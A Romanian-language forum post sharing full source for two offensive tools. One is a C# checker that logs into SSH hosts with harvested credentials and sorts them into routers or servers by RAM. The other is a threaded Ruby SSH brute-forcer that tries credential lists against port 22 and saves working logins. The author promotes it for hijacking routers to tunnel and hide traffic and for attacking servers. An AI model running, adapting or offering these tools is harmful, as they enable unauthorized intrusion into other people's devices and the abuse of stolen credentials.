mindark

Program scris în C# care sorteaz? o lista de host-uri cu ssh rulat pe port 22, în servere ?i routere, în dependen?? de cît RAM posed?. Hosturile într-un fi?ier aparte în format: host:user:pass Programul îl rulati prin cmd. Îl modific s? ar?te ?ara, uptime, viteza de internet etc., dac? topicul cap?t? aten?ie. Poftim link. Iat? ?i sursa, dac? cuiva îi este interesant using System; using System.Collections.Generic; using System.IO; using System.Linq; using System.Net; using System.Net.Sockets; using System.Text.RegularExpressions; using System.Threading; using Renci.SshNet; namespace sshb { class Program { private static readonly Queue<Cred> Hosts = new Queue<Cred>(); private static readonly ManualResetEvent Signal = new ManualResetEvent(false); private static int _threads; private static readonly object Locker = new object(); private static TextWriter _routers; private static TextWriter _servers; static bool CheckHost(string server, int port) { try { using (var client = new TcpClient()) { client.BeginConnect(IPAddress.Parse(server), port, null, null).AsyncWaitHandle.WaitOne(500, true); if (client.Connected) return true; return false; } } catch (Exception) { return false; } } private static void DoWork() { try { while (Hosts.Count > 0) { Cred host; try { host = Hosts.Dequeue(); } catch { continue; } if (!CheckHost(host.Ip, 22)) { continue; } try { using (var client = new SshClient(host.Ip, host.Login, host.Password)) { Console.WriteLine("trying " + host.Ip + " with login " + host.Login + " and password " + host.Password); client.ConnectionInfo.Timeout = TimeSpan.FromSeconds(5); client.Connect(); try { var cmd = client.CreateCommand("cat /proc/meminfo"); cmd.CommandTimeout = TimeSpan.FromSeconds(5); cmd.Execute(); var ram = Int32.Parse(Regex.Matches(cmd.Result, "MemTotal:.*?(\\d+)")[0].Groups[1].Value); if (ram / 1024 < 512) { Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("router: " + host.Ip); Console.ForegroundColor = ConsoleColor.White; _routers.WriteLine(host.Ip + ":" + host.Login + ":" + host.Password); _routers.Flush(); } else { Console.ForegroundColor = ConsoleColor.Red; Console.WriteLine("server: " + host.Ip); Console.ForegroundColor = ConsoleColor.White; _servers.WriteLine(host.Ip + ":" + host.Login + ":" + host.Password); _servers.Flush(); } } catch { Console.ForegroundColor = ConsoleColor.Green; Console.WriteLine("router: " + host.Ip); Console.ForegroundColor = ConsoleColor.White; //If something went wrong with command execution, but it connects _routers.WriteLine(host.Ip + ":" + host.Login + ":" + host.Password); _routers.Flush(); } client.Disconnect(); } } catch { } } } catch { } lock (Locker) { if (Interlocked.Decrement(ref _threads) == 0) { Signal.Set(); } } } public static void Main(string[] args) { if (args.Count() != 4) { Console.WriteLine("sshch <threads> <ips> <routers file> <servers file>"); } else { _routers = new StreamWriter(args[2]); _servers = new StreamWriter(args[3]); _threads = Convert.ToInt32(args[0]); var path = args[1]; if (!File.Exists(path)) { Console.WriteLine("Some arguments files are missing!"); } else if (_threads > File.ReadAllLines(path).Count()) { Console.WriteLine("Threads must be more than ips!"); } else { File.ReadAllLines(path).ToList().ForEach(c => Hosts.Enqueue(new Cred() { Ip = c.Split(':')[0], Login = c.Split(':')[1], Password = c.Split(':')[2] })); for (var i = 0; i < _threads; i++) { new Thread(DoWork).Start(); } Signal.WaitOne(); _routers.Close(); _servers.Close(); } } } } class Cred { public string Ip { get; set; } public string Login { get; set; } public string Password { get; set; } } }

Un bruteforce de ssh facut de mine in ruby, l-am testat pe masina virtuala pe un Intel core i5-750, da la 100 incercari/s. Ideal pentru a gasi vreun router, ca sa faceti ssh tunel si sa ascundeti traficul sub ssl, dar deasemenea il puteti folosi pentru a scana servere mai serioase. Pentru a rula programul instala?i Oracle JDK, si jruby ultimele versiuni pentru threaduri reale, nu green. Apoi din jruby/bin ii dati: gem install colorize gem install net-ssh Iata si codul la program. Curind voi posta un checker, care va sorta rezultatele la servere/routere. require 'rubygems' require 'net/ssh' require 'colorize' require 'thread' require 'socket' require 'timeout' def port_open?(ip, port, seconds=1) Timeout::timeout(seconds) do TCPSocket.new(ip, port).close return true end rescue Exception => e return false end if ARGV.length!=4 then abort('ruby scan.rb <ips> <users> <threads> <goods>') end ips, users, num_threads, routers = open(ARGV[0]).map{|line| line.gsub("\n", '')}, open(ARGV[1]).map{|line| line.gsub("\n", '')}, ARGV[2].to_i, File.new(ARGV[3], 'w') threads = [] scanned = 0 lock = Mutex.new num_threads.times do threads<<Thread.new do while ips.length>0 ip = '' lock.synchronize {ip = ips.pop} next if !port_open?(ip, 22) users.each do |user| begin username = user.split("/")[0] password = user.split("/")[1] scanned += 1 lock.synchronize{puts "#{scanned} tries, #{ips.length} remaining: trying #{ip} with user: #{username} and pass: #{password}".green} Timeout::timeout(5) do Net::SSH.start(ip, username, :password => password) do |ssh| puts "#{scanned}: found router #{ip}".red routers.write("#{ip}:#{username}:#{password}\n") routers.flush end end break rescue Exception => e end end end end end threads.each{|th| th.join}